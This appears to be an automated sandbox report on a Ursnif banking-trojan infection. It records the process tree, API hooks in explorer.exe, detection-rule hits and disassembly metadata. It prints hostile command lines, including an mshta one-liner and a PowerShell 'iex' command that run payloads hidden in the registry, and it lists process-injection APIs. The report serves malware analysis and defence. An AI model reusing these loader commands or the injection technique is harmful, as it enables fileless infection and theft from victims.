Nov 23, 2020 12:20:16.533633947 CET	5833	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 11:20:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 38 33 0d 0a 88 00 b4 dc 2d aa 29 3c 22 33 bb 63 07 06 6c b7 f9 ec 96 ea ca d6 58 60 05 22 5c 39 58 81 fb 5f 35 c7 e1 71 09 b3 e5 13 18 a9 07 82 75 de 66 5e 1b 35 8b 82 b2 27 3e 11 ae 79 5e b4 b3 0d 67 10 f5 d0 ef 7a 45 e0 5b 51 d5 2f 26 df f8 6a 78 97 b4 c4 29 90 a6 66 f6 02 51 d8 cb 64 61 9f f7 12 29 b3 ac 50 96 8e fa 8f 20 01 fa 27 a1 fe 0e 85 09 65 f7 a0 f3 d5 78 6b d6 82 8d 1b 6e 1f 99 2f 23 e9 bc 0d 0a 30 0d 0a 0d 0a Data Ascii: 83-)<"3clX`"\9X_5quf^5'>y^gzE[Q/&jx)fQda)P 'exkn/#0

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFABB035200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	6855020

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFABB03521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFABB035200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFABB03520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFABB035200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	6855020

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 4180 Parent PID: 3424

General

Start time:	12:18:39
Start date:	23/11/2020
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\2Q4tLHa5wbO1.vbs'
Imagebase:	0x7ff6defc0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 7092 Parent PID: 800

General

Start time:	12:19:05
Start date:	23/11/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff667450000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4168 Parent PID: 7092

General

Start time:	12:19:06
Start date:	23/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17410 /prefetch:2
Imagebase:	0x12a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6020 Parent PID: 7092

General

Start time:	12:19:11
Start date:	23/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17418 /prefetch:2
Imagebase:	0x12a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6552 Parent PID: 7092

General

Start time:	12:19:17
Start date:	23/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17424 /prefetch:2
Imagebase:	0x12a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 7008 Parent PID: 3424

General

Start time:	12:19:24
Start date:	23/11/2020
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Imagebase:	0x7ff7e3470000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 4604 Parent PID: 7008

General

Start time:	12:19:26
Start date:	23/11/2020
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3980 Parent PID: 4604

General

Start time:	12:19:26
Start date:	23/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: csc.exe PID: 3484 Parent PID: 4604

General

Start time:	12:19:39
Start date:	23/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline'
Imagebase:	0x7ff72bda0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 6200 Parent PID: 3484

General

Start time:	12:19:40
Start date:	23/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP'
Imagebase:	0x7ff7cafe0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: csc.exe PID: 4700 Parent PID: 4604

General

Start time:	12:19:44
Start date:	23/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline'
Imagebase:	0x7ff72bda0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: control.exe PID: 6328 Parent PID: 4240

General

Start time:	12:19:45
Start date:	23/11/2020
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff72cb90000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 796 Parent PID: 4700

General

Start time:	12:19:45
Start date:	23/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP'
Imagebase:	0x7ff7cafe0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 6328

General

Start time:	12:19:54
Start date:	23/11/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 3656 Parent PID: 3424

General

Start time:	12:19:56
Start date:	23/11/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4268 Parent PID: 3424

General

Start time:	12:20:00
Start date:	23/11/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 2216 Parent PID: 3424

General

Start time:	12:20:03
Start date:	23/11/2020
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\404E.bi1'
Imagebase:	0xc60000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4772 Parent PID: 3424

General

Start time:	12:20:03
Start date:	23/11/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: conhost.exe PID: 6692 Parent PID: 2216

General

Start time:	12:20:07
Start date:	23/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: nslookup.exe PID: 6632 Parent PID: 2216

General

Start time:	12:20:07
Start date:	23/11/2020
Path:	C:\Windows\System32\nslookup.exe
Wow64 process (32bit):	false
Commandline:	nslookup myip.opendns.com resolver1.opendns.com
Imagebase:	0x7ff69c1d0000
File size:	86528 bytes
MD5 hash:	AF1787F1DBE0053D74FC687E7233F8CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4660 Parent PID: 3424

General

Start time:	12:20:09
Start date:	23/11/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: rundll32.exe PID: 6828 Parent PID: 6328

General

Start time:	12:20:12
Start date:	23/11/2020
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff7e3a80000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: mshta.exe PID: 7008 Parent PID: 3424 mshta.exeCOMMON

Executed Functions

Function 00000164FEC10FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000003.745965279.00000164FEC10000.00000010.00000001.sdmp, Offset: 00000164FEC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_3_164fec10000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 6b68fdca96454f3b21c7927874755cba18045e35a5dea756eba2e05ca586b731
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: F690021449548666D42411950C4729D54416388691FD544C0651690144D44F02965252

Uniqueness

Uniqueness Score: -1.00%

Function 00000164FEC10FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000003.745965279.00000164FEC10000.00000010.00000001.sdmp, Offset: 00000164FEC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_3_164fec10000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 6b68fdca96454f3b21c7927874755cba18045e35a5dea756eba2e05ca586b731
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: F690021449548666D42411950C4729D54416388691FD544C0651690144D44F02965252

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: control.exe PID: 6328 Parent PID: 4240 control.exeCOMMON

Execution Graph

Execution Coverage:	5.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	34.4%
Total number of Nodes:	634
Total number of Limit Nodes:	48

Executed Functions

Function 00B9676C, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 643
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 00B96811

Strings

@, xrefs: 00B96C3F

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: AllocateHeap
String ID: @
API String ID: 1279760036-2766056989
Opcode ID: ee1595ae80a92ada7dedeeacb340e960b6c6dcc775881cad41c6e6d46d7a8d37
Instruction ID: a57ac4e02eac43b8afb62a3ce622ee63bdf3f9289973b8ec9f0ec74cf57970b5
Opcode Fuzzy Hash: ee1595ae80a92ada7dedeeacb340e960b6c6dcc775881cad41c6e6d46d7a8d37
Instruction Fuzzy Hash: 36126130718E098FDB69EF68D895AA673E1FB98301F40467EE45AC3251EF34ED418B85

Uniqueness

Uniqueness Score: -1.00%

Function 00B9F7EC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationToken.NTDLL ref: 00B9F8A0
NtQueryInformationToken.NTDLL ref: 00B9F8E8
NtClose.NTDLL ref: 00B9F920

Strings

0, xrefs: 00B9F84B

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: InformationQueryToken$Close
String ID: 0
API String ID: 459398573-4108050209
Opcode ID: 75f5f25a32e44abd967634ea221ebc7d1d7f2de2e2c95ac0f277a3d61ca82601
Instruction ID: a2d21f195a9d7fe4321891b5a26d60266acc54aa8fedfdc284cfa71c49ab7463
Opcode Fuzzy Hash: 75f5f25a32e44abd967634ea221ebc7d1d7f2de2e2c95ac0f277a3d61ca82601
Instruction Fuzzy Hash: 73310930218B488FD764EF19D8C47AAB7E5FB98315F40497EE58AC3250DB34D905CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00B8F560, Relevance: 6.2, APIs: 4, Instructions: 197
nativethreadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationProcess.NTDLL ref: 00B8F62A
CreateRemoteThread.KERNELBASE ref: 00B8F6DA

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: CreateInformationProcessRemoteThread
String ID:
API String ID: 3020566308-0
Opcode ID: 2a60409d33bb50b087945fb9e8025c27173b54c3f3ba081195cfe01e6e59568e
Instruction ID: af61f3cfb221af0b6884a90d1f14fac22f63214d45c0c7dd75fb3cf29f81a6a4
Opcode Fuzzy Hash: 2a60409d33bb50b087945fb9e8025c27173b54c3f3ba081195cfe01e6e59568e
Instruction Fuzzy Hash: 7951913061CB068FE758EF68D8996B677E1EBA9301F00857DE94AC3261EA70DD44CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B9A4BC, Relevance: 4.8, APIs: 3, Instructions: 297
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE ref: 00B9A51D
VirtualAlloc.KERNELBASE ref: 00B9A617
VirtualFree.KERNELBASE ref: 00B9A6F4

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: Virtual$AllocCreateFreeHeap
String ID:
API String ID: 2341667014-0
Opcode ID: 0e2db259d8c6b1358d19cfe41b628647c1408c81e58ecea94120c053d597cdbc
Instruction ID: 71a383865ae931170778b3dc9de05fc2953fd1947765271941b6b137581e6ebf
Opcode Fuzzy Hash: 0e2db259d8c6b1358d19cfe41b628647c1408c81e58ecea94120c053d597cdbc
Instruction Fuzzy Hash: 02919870618B098FEB58EF68E8857A673E5FB94310F10817DE59BC3251EF38D8428782

Uniqueness

Uniqueness Score: -1.00%

Function 00B9C164, Relevance: 4.0, APIs: 2, Instructions: 1050synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexExA.KERNEL32 ref: 00B9C22F
GetUserNameA.ADVAPI32 ref: 00B9C4C3

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: CreateMutexNameUser
String ID:
API String ID: 3764123871-0
Opcode ID: fffaa4b755b4794267c42af2f427b21d38ec734e3ecc3f810019e9c7598c9933
Instruction ID: 7067c7dc2f00ce20fe254a697297db65111374ebdc4668cb6f691fd913c996e1
Opcode Fuzzy Hash: fffaa4b755b4794267c42af2f427b21d38ec734e3ecc3f810019e9c7598c9933
Instruction Fuzzy Hash: 6A72C670618A498FEB68EF28EC856797BE1F758700F10457ED44BC3661DE39E942CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00B8387C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 00B83A1E

Part of subcall function 00B8FFCC: NtMapViewOfSection.NTDLL ref: 00B90018

Strings

0, xrefs: 00B83A12

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: Section$CreateView
String ID: 0
API String ID: 1585966358-4108050209
Opcode ID: 1b09ba81fbc693a19164b594d56175538ac6b8b8ca3d4d1b7c118079c7b6344a
Instruction ID: a5ae9ce8fefc12f1b5a638891d9da398023f662da43f6999cd7277d253b0822f
Opcode Fuzzy Hash: 1b09ba81fbc693a19164b594d56175538ac6b8b8ca3d4d1b7c118079c7b6344a
Instruction Fuzzy Hash: D461A17061CB098FDB54EF28D889B79B7E1FB98701F10856EE88AC7261DB34D941CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B7BAB4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL ref: 00B7BAF1

Strings

@, xrefs: 00B7BAD5

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: f2b98a115a46b9e14b99d056e6ec68db975ce604077d4ffc8ec3e6b59ad833c6
Instruction ID: 760d4b39204f7710c2974b9a7077271a2792690f4cd1f888dc0ba600be4e4f2c
Opcode Fuzzy Hash: f2b98a115a46b9e14b99d056e6ec68db975ce604077d4ffc8ec3e6b59ad833c6
Instruction Fuzzy Hash: 18F09070A19B088BDB549FE8D8CD63976E0F758305F6009ADE51AC7354EB78C944CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1002, Relevance: 3.3, APIs: 2, Instructions: 335
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 00BB127A
NtProtectVirtualMemory.NTDLL ref: 00BB1309

Memory Dump Source

Source File: 00000019.00000002.846924873.0000000000BB1000.00000040.00000001.sdmp, Offset: 00BB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_bb1000_control.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 62c72e5b7f7a7de72ca6d056198b1a577312a5f0deb375b530163255d9cf7a45
Instruction ID: 2c32add943141af32ad5f3265f3106b769a8b4fe93bef91891ac01481fd9e0ac
Opcode Fuzzy Hash: 62c72e5b7f7a7de72ca6d056198b1a577312a5f0deb375b530163255d9cf7a45
Instruction Fuzzy Hash: 36A1153121CB884FC724DF2CD8916F9B7E1FB95310F9849AED08BC3252E674A8468786

Uniqueness

Uniqueness Score: -1.00%

Function 00B9ADD4, Relevance: 1.7, APIs: 1, Instructions: 183nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 00B9AE49

Part of subcall function 00B7CCA0: NtReadVirtualMemory.NTDLL ref: 00B7CCBF

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: InformationMemoryProcessQueryReadVirtual
String ID:
API String ID: 1498878907-0
Opcode ID: d01a758f901a9215e797dd66cccda8b0241a4ddb1edb813280150e88a935fc82
Instruction ID: 6e248a245b41c339514448bc0886f19b97562fce4c870f6ca40256f71a05655f
Opcode Fuzzy Hash: d01a758f901a9215e797dd66cccda8b0241a4ddb1edb813280150e88a935fc82
Instruction Fuzzy Hash: 4051877021CB044BDB59EB28D8997AAB3D5FB98340F44857EA88EC3155DE34D945CBC3

Uniqueness

Uniqueness Score: -1.00%

Function 00B81AC4, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 00B81AEA

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 1b5ff2e331e8eff1cde1f90d4881bb7eda4a5dda6d44182f68fae4d6ac00e22a
Instruction ID: f16bde5b5c42053d4164f95065a3bb799f171379b2deb3ba624bbdba122a85d9
Opcode Fuzzy Hash: 1b5ff2e331e8eff1cde1f90d4881bb7eda4a5dda6d44182f68fae4d6ac00e22a
Instruction Fuzzy Hash: 9801A930319E4D8F9B94EF6DD4C8A3573E5FBA830575409AE9409C3130E738D886CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00B8FFCC, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 00B90018

Memory Dump Source

Source File: 00000019.00000002.846806132.0000000000B71000.00000020.00000001.sdmp, Offset: 00B71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_b71000_control.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction ID: 51a7994bdec7616c905c00f56e154b07cbf51a8d7a8cab8792c72f7a0653b415
